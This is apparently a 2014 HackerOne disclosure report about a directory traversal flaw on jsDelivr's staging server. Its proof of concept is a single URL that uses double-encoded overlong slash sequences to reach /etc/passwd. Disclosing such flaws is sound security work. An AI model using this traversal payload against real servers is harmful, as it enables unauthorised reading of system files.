jsDelivr: Directory Traversal at http://staging.jsdelivr.net/

2014-06-29T09:37:24
ID H1:18371
Type hackerone
Reporter vineet
Modified 2014-08-20T15:28:58

Description

hi,

Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

POC: go this link ->

http://staging.jsdelivr.net//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd